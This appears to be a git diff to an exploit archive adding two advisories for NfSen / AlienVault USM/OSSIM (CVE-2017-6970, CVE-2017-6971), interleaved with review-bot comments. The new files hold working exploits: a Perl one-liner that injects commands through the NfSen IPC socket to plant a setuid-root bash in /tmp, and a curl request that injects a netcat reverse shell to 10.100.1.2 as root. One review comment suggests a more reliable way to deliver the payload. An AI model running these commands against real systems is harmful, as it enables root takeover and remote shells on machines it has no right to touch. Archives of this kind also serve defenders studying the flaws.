diff --git a/files.csv b/files.csv
index f0c0ec080..8547530fb 100644
--- a/files.csv
+++ b/files.csv
@@ -9060,6 +9060,7 @@ id,file,description,date,author,platform,type,port
 41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0
 41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0
 41887,platforms/windows/local/41887.txt,"VirusChaser 8.0 - Buffer Overflow (SEH)",2017-04-14,0x41Li,windows,local,0
+42305,platforms/linux/local/42305.txt,"NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Privilege Escalation",2017-07-10,"Paul Taylor",linux,local,0
 41886,platforms/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Privilege Escalation",2017-04-15,"Nassim Asrir",linux,local,0
 41721,platforms/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
 41722,platforms/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
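Review bot: The new 42305 index entry gives the affected range as `NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6`, but the advisory it points at (42305.txt) is titled `NfSen <= 1.3.7, AlienVault USM/OSSIM <= 5.3.6` and states `Tested on: AlienVault USM 5.3.6`, so the index excludes the exact versions the PoC was validated against. Anyone triaging from this CSV would wrongly conclude that NfSen 1.3.7 and USM/OSSIM 5.3.6 are unaffected. I would change the description to `"NfSen <= 1.3.7 / AlienVault OSSIM <= 5.3.6 - Privilege Escalation"` to match the advisory header; the sibling 42306 entry added in the same commit already uses `<=` for NfSen.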
@@ -14335,7 +14336,7 @@ id,file,description,date,author,platform,type,port
 31639,platforms/php/remote/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote,0
 31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,windows,remote,9090
 31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555
-31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0
+31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",windows,remote,0
 31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,php,remote,0
 31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",unix,remote,0
 31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80
@@ -15571,7 +15572,7 @@ id,file,description,date,author,platform,type,port
 40867,platforms/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote,0
 40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
-40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
+40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer 9 - 'jscript9' Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
 40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
 40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0
 40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
@@ -15689,6 +15690,7 @@ id,file,description,date,author,platform,type,port
 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778
 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
 42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
+42306,platforms/linux/remote/42306.txt,"NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
diff --git a/platforms/linux/local/42305.txt b/platforms/linux/local/42305.txt
new file mode 100755
index 000000000..f751ce568
--- /dev/null
+++ b/platforms/linux/local/42305.txt
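Review bot: The new 42306 entry records port `0` even though the advisory it indexes reaches the target over HTTPS (`https://$targetip/ossim/nfsen/nfsen.php`), while other remote entries in this file do carry the service port (`42297 … 7778` in this hunk, `31917 … 9090` and `31689 … 5555` earlier). If the port column is meant to hold the default service port, `443` is the consistent value for this line. If `0` is the index's convention for "not a fixed port", this can be ignored, but the inconsistency with 42297 three lines above suggests it is not.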
@@ -0,0 +1,30 @@
+# Exploit Title: Local root exploit affecting NfSen <= 1.3.7, AlienVault USM/OSSIM <= 5.3.6
+# Version: NfSen 1.3.7
+# Version: AlienVault 5.3.6
+# Date: 2017-07-10
+# Vendor Homepage: http://nfsen.sourceforge.net/
+# Vendor Homepage: http://www.alienvault.com/
+# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download
+# Exploit Author: Paul Taylor / Foregenix Ltd
+# Website: http://www.foregenix.com/blog
+# Tested on: AlienVault USM 5.3.6
+# CVE: CVE-2017-6970
+
+1. Description
+
+The web user (in AlienVault USB www-data) has access to the NfSen IPC UNIX domain socket. This can be used to send a crafted command (complete with shell metacharacter injection) to the NfSen Perl components, causing OS command injection in a root privilege context, and therefore can be leverage for privilege escalation from the web user to full root privileges.
+
+2. Proof of Concept
+
+Pre-requisites - web user/www-data shell (e.g. web shell, or reverse shell).
+
+Execute the following command:
+
+perl -e 'use Socket; socket(my $nfsend, AF_UNIX, SOCK_STREAM, 0); connect($nfsend, sockaddr_un("/var/nfsen/run/nfsen.comm")); print $nfsend "run-nfdump\nargs=-h \$(bash -c \"cp /bin/bash /tmp\")\n.\nrun-nfdump\nargs=-h \$(bash -c \"chmod u+s /tmp/bash\")\n.\n";'
+
+This will create a set uid root bash binary in /tmp, which can then be used to gain full root privileges.
+
+3. Solution:
+
+Update to latest version of NfSen/USM/OSSIM
+
diff --git a/platforms/linux/remote/42306.txt b/platforms/linux/remote/42306.txt
new file mode 100755
index 000000000..4e5c9dab5
--- /dev/null
+++ b/platforms/linux/remote/42306.txt
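Review bot: The PoC leaves a persistent setuid-root `/tmp/bash` on the host and the write-up never tells the reader to remove it; since the copy is created by root and will normally be world-executable, any local user can take root from it long after the test, so a tester who follows these steps verbatim plants a backdoor on the client's system. Add a cleanup step after the "This will create a set uid root bash binary" line, e.g. `Cleanup: rm -f /tmp/bash once root has been confirmed`, or demonstrate root execution with something non-persistent such as `args=-h $(id > /tmp/nfsen-poc)` instead. Two smaller points: "AlienVault USB www-data" in the description should read "USM", and "Update to latest version of NfSen/USM/OSSIM" does not identify a fixed release — the description itself locates the defect in the Perl components shell-interpolating the `args` line, so the Solution should name the NfSen/USM build that sanitizes it and say explicitly that tightening permissions on `/var/nfsen/run/nfsen.comm` is not a mitigation, because the web front end needs that socket.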
@@ -0,0 +1,33 @@
+# Exploit Title: NfSen/AlienVault remote root exploit (IPC query command injection)
+# Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected.
+# Version: AlienVault 5.3.4
+# Date: 2017-07-10
+# Vendor Homepage: http://nfsen.sourceforge.net/
+# Vendor Homepage: http://www.alienvault.com/
+# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download
+# Exploit Author: Paul Taylor / Foregenix Ltd
+# Website: http://www.foregenix.com/blog
+# Tested on: AlienVault USM 5.3.4
+# CVE: CVE-2017-6971
+1. Description
+
+A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request containing control characters and shell commands which will be executed as root on a vulnerable system.
+
+2. Proof of Concept
+# From a linux bash prompt on the attacker's machine:
+
+# Set target IP
+targetip='10.100.1.1'
+
+# Set desired command to inject (in this case a reverse shell, using Netcat which is conveniently available on an AlienVault USM All-In-One):
+cmd='nc -ne /bin/bash 10.100.1.2 443';
+
+# Set the PHPSESSID of an authenticated session which has *already* submitted at least one valid NfSen query for processing via the Web UI.
+PHPSESSID='offq09ckq66fqtvdd0vsuhk5c7';
+
+# Next use curl to send the exploit
+curl -o /dev/null -s -k -b "PHPSESSID=$PHPSESSID" -d "process=Process&output=custom+...&customfmt=%0A.%0Arun-nfdump%0Aargs=-h; $cmd #" https://$targetip/ossim/nfsen/nfsen.php
+
+3. Solution:
+
+Update to latest version of NfSen/USM/OSSIM
diff --git a/platforms/windows/remote/31694.py b/platforms/windows/remote/31694.py
index 041d6d21d..2f96217f8 100755
--- a/platforms/windows/remote/31694.py
+++ b/platforms/windows/remote/31694.py
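Review bot: On the curl line `$cmd` is spliced raw into the `-d` form body, so any injected command containing `&`, `+` or `%` is split or decoded by the form parser before it reaches NfSen and the PoC silently fails; sending that field with `--data-urlencode "customfmt=$(printf '\n.\nrun-nfdump\nargs=-h; %s #' "$cmd")"` (keeping `-d` for `process` and `output`) delivers the payload intact. The payload also shows two separable weaknesses — the PHP front end passes raw newlines from `customfmt` into the IPC stream, which is what lets `%0A.%0Arun-nfdump` close the current message and open a new command, and the Perl backend then shell-interpolates the `args` line — so a fix that only strips newlines at the web layer leaves the local path described in 42305.txt open, and the Solution section should say both layers need the fixed release rather than just "Update to latest version". Finally, `-k` disables certificate validation; fine for a lab, but a one-line comment such as `# -k: skip TLS verification, USM ships a self-signed cert` would stop it being copied into tooling unthinkingly.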
@@ -10,7 +10,7 @@ banner = """ #################################################################################### ### ### -### Coded by: Muhammad EL Harmeel m.harmeel(at)gmail(dot)com ### +### Coded by: Muhammad ELHarmeel @0xhandler ### ### ### ####################################################################################